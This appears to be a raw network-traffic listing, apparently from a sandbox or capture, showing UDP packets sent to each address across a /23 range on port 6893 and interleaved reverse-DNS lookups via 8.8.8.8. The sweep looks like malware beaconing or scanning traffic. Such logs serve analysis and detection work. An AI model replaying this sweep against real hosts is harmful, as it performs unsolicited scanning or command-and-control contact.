FR 87.98.178.197:6893 udp
FR 87.98.178.198:6893 udp
FR 87.98.178.199:6893 udp
FR 87.98.178.200:6893 udp
FR 87.98.178.201:6893 udp
FR 87.98.178.202:6893 udp
FR 87.98.178.203:6893 udp
FR 87.98.178.204:6893 udp
FR 87.98.178.205:6893 udp
FR 87.98.178.206:6893 udp
FR 87.98.178.207:6893 udp
FR 87.98.178.208:6893 udp
FR 87.98.178.209:6893 udp
FR 87.98.178.210:6893 udp
FR 87.98.178.211:6893 udp
FR 87.98.178.212:6893 udp
FR 87.98.178.213:6893 udp
FR 87.98.178.214:6893 udp
FR 87.98.178.215:6893 udp
FR 87.98.178.216:6893 udp
FR 87.98.178.217:6893 udp
FR 87.98.178.218:6893 udp
FR 87.98.178.219:6893 udp
FR 87.98.178.220:6893 udp
FR 87.98.178.221:6893 udp
FR 87.98.178.222:6893 udp
FR 87.98.178.223:6893 udp
FR 87.98.178.224:6893 udp
FR 87.98.178.225:6893 udp
FR 87.98.178.226:6893 udp
FR 87.98.178.227:6893 udp
FR 87.98.178.228:6893 udp
FR 87.98.178.229:6893 udp
FR 87.98.178.230:6893 udp
FR 87.98.178.231:6893 udp
FR 87.98.178.232:6893 udp
FR 87.98.178.233:6893 udp
FR 87.98.178.234:6893 udp
FR 87.98.178.235:6893 udp
FR 87.98.178.236:6893 udp
FR 87.98.178.237:6893 udp
FR 87.98.178.238:6893 udp
FR 87.98.178.239:6893 udp
FR 87.98.178.240:6893 udp
FR 87.98.178.241:6893 udp
FR 87.98.178.242:6893 udp
FR 87.98.178.243:6893 udp
US 8.8.8.8:53 95.176.98.87.in-addr.arpa udp
FR 87.98.178.244:6893 udp
FR 87.98.178.245:6893 udp
FR 87.98.178.246:6893 udp
FR 87.98.178.247:6893 udp
FR 87.98.178.248:6893 udp
US 8.8.8.8:53 96.176.98.87.in-addr.arpa udp
FR 87.98.178.249:6893 udp
FR 87.98.178.250:6893 udp
FR 87.98.178.251:6893 udp
FR 87.98.178.252:6893 udp
FR 87.98.178.253:6893 udp
FR 87.98.178.254:6893 udp
US 8.8.8.8:53 97.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 98.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 99.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 100.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 101.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 102.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 103.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 104.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 105.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 106.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 107.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 109.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 108.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 111.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 110.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 112.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 113.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 114.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 115.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 116.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 117.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 118.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 119.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 120.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 121.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 122.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 123.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 124.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 125.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 127.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 126.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 128.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 129.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 130.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 131.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 133.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 132.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 134.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 135.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 136.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 138.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 137.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 140.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 139.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 141.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 142.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 143.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 144.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 145.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 146.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 147.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 148.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 149.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 150.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 152.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 153.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 154.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 155.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 156.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 157.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 158.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 160.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 159.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 161.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 162.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 163.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 164.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 165.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 166.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 167.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 168.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 169.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 170.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 171.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 172.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 173.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 174.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 175.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 176.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 177.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 178.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 179.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 180.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 181.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 182.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 183.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 184.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 185.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 186.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 187.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 188.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 189.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 190.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 192.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 193.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 194.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 195.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 196.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 197.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 198.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 199.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 200.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 201.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 202.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 203.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 204.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 205.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 206.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 207.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 208.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 209.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 210.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 211.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 212.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 213.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 215.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 214.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 216.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 217.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 218.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 219.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 220.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 221.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 222.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 223.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 224.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 225.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 226.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 227.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 228.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 229.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 230.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 231.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 233.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 232.176.98.87.in-addr.arpa udp
FR 87.98.178.255:6893 udp
FR 87.98.179.0:6893 udp
FR 87.98.179.1:6893 udp
FR 87.98.179.2:6893 udp
FR 87.98.179.3:6893 udp
FR 87.98.179.4:6893 udp
FR 87.98.179.5:6893 udp
FR 87.98.179.6:6893 udp
FR 87.98.179.7:6893 udp
FR 87.98.179.8:6893 udp
FR 87.98.179.9:6893 udp
FR 87.98.179.10:6893 udp
FR 87.98.179.11:6893 udp
FR 87.98.179.12:6893 udp
FR 87.98.179.13:6893 udp
FR 87.98.179.14:6893 udp
FR 87.98.179.15:6893 udp
FR 87.98.179.16:6893 udp
FR 87.98.179.17:6893 udp
FR 87.98.179.18:6893 udp
FR 87.98.179.19:6893 udp
FR 87.98.179.20:6893 udp
FR 87.98.179.21:6893 udp
FR 87.98.179.22:6893 udp
FR 87.98.179.23:6893 udp
FR 87.98.179.24:6893 udp
FR 87.98.179.25:6893 udp
FR 87.98.179.26:6893 udp
FR 87.98.179.27:6893 udp
FR 87.98.179.28:6893 udp
FR 87.98.179.29:6893 udp
FR 87.98.179.30:6893 udp
FR 87.98.179.31:6893 udp
FR 87.98.179.32:6893 udp
FR 87.98.179.33:6893 udp
FR 87.98.179.34:6893 udp
FR 87.98.179.35:6893 udp
FR 87.98.179.36:6893 udp
FR 87.98.179.37:6893 udp
FR 87.98.179.38:6893 udp
FR 87.98.179.39:6893 udp
FR 87.98.179.40:6893 udp
FR 87.98.179.41:6893 udp
FR 87.98.179.42:6893 udp
FR 87.98.179.43:6893 udp
FR 87.98.179.44:6893 udp
FR 87.98.179.45:6893 udp
FR 87.98.179.46:6893 udp
FR 87.98.179.47:6893 udp
FR 87.98.179.48:6893 udp
FR 87.98.179.49:6893 udp
FR 87.98.179.50:6893 udp
FR 87.98.179.51:6893 udp
US 8.8.8.8:53 234.176.98.87.in-addr.arpa udp
FR 87.98.179.52:6893 udp
FR 87.98.179.53:6893 udp
FR 87.98.179.54:6893 udp
FR 87.98.179.55:6893 udp
FR 87.98.179.56:6893 udp
FR 87.98.179.57:6893 udp
FR 87.98.179.58:6893 udp
FR 87.98.179.59:6893 udp
FR 87.98.179.60:6893 udp
FR 87.98.179.61:6893 udp
FR 87.98.179.62:6893 udp
FR 87.98.179.63:6893 udp
FR 87.98.179.64:6893 udp
FR 87.98.179.65:6893 udp
FR 87.98.179.66:6893 udp
FR 87.98.179.67:6893 udp
FR 87.98.179.68:6893 udp
FR 87.98.179.69:6893 udp
FR 87.98.179.70:6893 udp
FR 87.98.179.71:6893 udp
FR 87.98.179.72:6893 udp
FR 87.98.179.73:6893 udp
FR 87.98.179.74:6893 udp
FR 87.98.179.75:6893 udp
FR 87.98.179.76:6893 udp
FR 87.98.179.77:6893 udp
FR 87.98.179.78:6893 udp
FR 87.98.179.79:6893 udp
FR 87.98.179.80:6893 udp
FR 87.98.179.81:6893 udp
FR 87.98.179.82:6893 udp
FR 87.98.179.83:6893 udp
FR 87.98.179.84:6893 udp
FR 87.98.179.85:6893 udp
FR 87.98.179.86:6893 udp
FR 87.98.179.87:6893 udp
FR 87.98.179.88:6893 udp
FR 87.98.179.89:6893 udp
FR 87.98.179.90:6893 udp
FR 87.98.179.91:6893 udp
FR 87.98.179.92:6893 udp
FR 87.98.179.93:6893 udp
FR 87.98.179.94:6893 udp
FR 87.98.179.95:6893 udp
FR 87.98.179.96:6893 udp
FR 87.98.179.97:6893 udp
FR 87.98.179.98:6893 udp
FR 87.98.179.99:6893 udp
FR 87.98.179.100:6893 udp
FR 87.98.179.101:6893 udp
FR 87.98.179.102:6893 udp
FR 87.98.179.103:6893 udp
FR 87.98.179.104:6893 udp
FR 87.98.179.105:6893 udp
FR 87.98.179.106:6893 udp
FR 87.98.179.107:6893 udp
FR 87.98.179.108:6893 udp
FR 87.98.179.109:6893 udp
FR 87.98.179.110:6893 udp
FR 87.98.179.111:6893 udp
FR 87.98.179.112:6893 udp
FR 87.98.179.113:6893 udp
FR 87.98.179.114:6893 udp
FR 87.98.179.115:6893 udp
FR 87.98.179.116:6893 udp
FR 87.98.179.117:6893 udp
FR 87.98.179.118:6893 udp
FR 87.98.179.119:6893 udp
FR 87.98.179.120:6893 udp
FR 87.98.179.121:6893 udp
FR 87.98.179.122:6893 udp
FR 87.98.179.123:6893 udp
FR 87.98.179.124:6893 udp
FR 87.98.179.125:6893 udp
FR 87.98.179.126:6893 udp
FR 87.98.179.127:6893 udp
FR 87.98.179.128:6893 udp
FR 87.98.179.129:6893 udp
FR 87.98.179.130:6893 udp
FR 87.98.179.131:6893 udp
FR 87.98.179.132:6893 udp
FR 87.98.179.133:6893 udp
FR 87.98.179.134:6893 udp
FR 87.98.179.135:6893 udp
FR 87.98.179.136:6893 udp
FR 87.98.179.137:6893 udp
FR 87.98.179.138:6893 udp
FR 87.98.179.139:6893 udp
FR 87.98.179.140:6893 udp
FR 87.98.179.141:6893 udp
FR 87.98.179.142:6893 udp
FR 87.98.179.143:6893 udp
FR 87.98.179.144:6893 udp
FR 87.98.179.145:6893 udp
FR 87.98.179.146:6893 udp
FR 87.98.179.147:6893 udp
FR 87.98.179.148:6893 udp
FR 87.98.179.149:6893 udp
FR 87.98.179.150:6893 udp
FR 87.98.179.151:6893 udp
FR 87.98.179.152:6893 udp
FR 87.98.179.153:6893 udp
FR 87.98.179.154:6893 udp
FR 87.98.179.155:6893 udp
FR 87.98.179.156:6893 udp
FR 87.98.179.157:6893 udp
FR 87.98.179.158:6893 udp
FR 87.98.179.159:6893 udp
FR 87.98.179.160:6893 udp
FR 87.98.179.161:6893 udp
FR 87.98.179.162:6893 udp
FR 87.98.179.163:6893 udp
FR 87.98.179.164:6893 udp
FR 87.98.179.165:6893 udp
FR 87.98.179.166:6893 udp
FR 87.98.179.167:6893 udp
FR 87.98.179.168:6893 udp
FR 87.98.179.169:6893 udp
FR 87.98.179.170:6893 udp
FR 87.98.179.171:6893 udp
FR 87.98.179.172:6893 udp
FR 87.98.179.173:6893 udp
FR 87.98.179.174:6893 udp
FR 87.98.179.175:6893 udp
FR 87.98.179.176:6893 udp
FR 87.98.179.177:6893 udp
FR 87.98.179.178:6893 udp
FR 87.98.179.179:6893 udp
FR 87.98.179.180:6893 udp
FR 87.98.179.181:6893 udp
FR 87.98.179.182:6893 udp
FR 87.98.179.183:6893 udp
FR 87.98.179.184:6893 udp
FR 87.98.179.185:6893 udp
FR 87.98.179.186:6893 udp
FR 87.98.179.187:6893 udp
FR 87.98.179.188:6893 udp
FR 87.98.179.189:6893 udp
FR 87.98.179.190:6893 udp
FR 87.98.179.191:6893 udp
FR 87.98.179.192:6893 udp
FR 87.98.179.193:6893 udp
FR 87.98.179.194:6893 udp
FR 87.98.179.195:6893 udp
FR 87.98.179.196:6893 udp
FR 87.98.179.197:6893 udp
FR 87.98.179.198:6893 udp
FR 87.98.179.199:6893 udp
FR 87.98.179.200:6893 udp
FR 87.98.179.201:6893 udp
FR 87.98.179.202:6893 udp
FR 87.98.179.203:6893 udp
FR 87.98.179.204:6893 udp
FR 87.98.179.205:6893 udp
FR 87.98.179.206:6893 udp
FR 87.98.179.207:6893 udp
FR 87.98.179.208:6893 udp
FR 87.98.179.209:6893 udp
FR 87.98.179.210:6893 udp
FR 87.98.179.211:6893 udp
FR 87.98.179.212:6893 udp
FR 87.98.179.213:6893 udp
FR 87.98.179.214:6893 udp
FR 87.98.179.215:6893 udp
FR 87.98.179.216:6893 udp
FR 87.98.179.217:6893 udp
FR 87.98.179.218:6893 udp
FR 87.98.179.219:6893 udp
FR 87.98.179.220:6893 udp
FR 87.98.179.221:6893 udp
FR 87.98.179.222:6893 udp
FR 87.98.179.223:6893 udp
FR 87.98.179.224:6893 udp
FR 87.98.179.225:6893 udp
FR 87.98.179.226:6893 udp
FR 87.98.179.227:6893 udp
FR 87.98.179.228:6893 udp
FR 87.98.179.229:6893 udp
FR 87.98.179.230:6893 udp
FR 87.98.179.231:6893 udp
FR 87.98.179.232:6893 udp
FR 87.98.179.233:6893 udp
FR 87.98.179.234:6893 udp
FR 87.98.179.235:6893 udp
FR 87.98.179.236:6893 udp
FR 87.98.179.237:6893 udp
FR 87.98.179.238:6893 udp
FR 87.98.179.239:6893 udp
FR 87.98.179.240:6893 udp
FR 87.98.179.241:6893 udp
FR 87.98.179.242:6893 udp
FR 87.98.179.243:6893 udp
FR 87.98.179.244:6893 udp
FR 87.98.179.245:6893 udp
FR 87.98.179.246:6893 udp
FR 87.98.179.247:6893 udp
FR 87.98.179.248:6893 udp
FR 87.98.179.249:6893 udp
FR 87.98.179.250:6893 udp
FR 87.98.179.251:6893 udp
FR 87.98.179.252:6893 udp
FR 87.98.179.253:6893 udp
FR 87.98.179.254:6893 udp
US 8.8.8.8:53 235.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 236.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 237.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 238.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 239.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 240.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 241.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 242.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 244.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 243.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 245.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 246.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 247.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 248.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 249.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 250.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 251.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 252.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 253.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 254.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 255.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 0.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 1.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 2.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 3.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 4.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 5.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 6.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 7.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 8.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 9.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 10.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 11.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 12.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 13.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 14.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 15.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 16.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 17.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 19.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 18.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 20.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 21.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 22.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 23.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 24.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 25.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 26.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 27.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 28.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 29.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 30.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 31.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 32.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 33.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 34.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 35.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 36.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 37.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 38.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 39.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 40.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 41.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 42.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 43.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 44.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 45.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 46.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 47.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 48.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 49.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 50.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 51.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 52.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 53.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 54.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 55.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 56.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 57.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 58.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 59.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 60.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 61.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 62.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 63.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 64.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 65.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 66.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 67.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 68.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 69.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 70.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 71.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 72.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 73.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 74.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 75.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 76.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 77.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 78.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 79.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 81.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 82.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 83.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 84.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 85.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 86.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 87.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 88.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 91.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 92.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 93.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 94.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 95.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 96.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 97.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 98.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 99.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 100.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 101.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 102.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 103.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 104.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 105.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 106.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 107.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 108.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 109.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 110.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 111.177.98.87.in-addr.arpa udp
FR 87.98.179.255:6893 udp
US 8.8.8.8:53 113.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 112.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 114.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 115.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 116.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 117.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 118.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 119.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 120.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 121.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 123.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 122.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 124.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 125.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 126.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 127.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 128.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 129.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 130.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 131.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 132.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 133.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 134.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 135.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 136.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 137.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 138.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 139.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 140.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 141.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 142.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 143.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 144.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 145.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 146.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 147.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 148.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 149.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 150.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 151.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 152.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 153.177.98.87.in-addr.arpa udp
US 8.8.8.8:53 154.177.98.87.in-addr.arpa udp
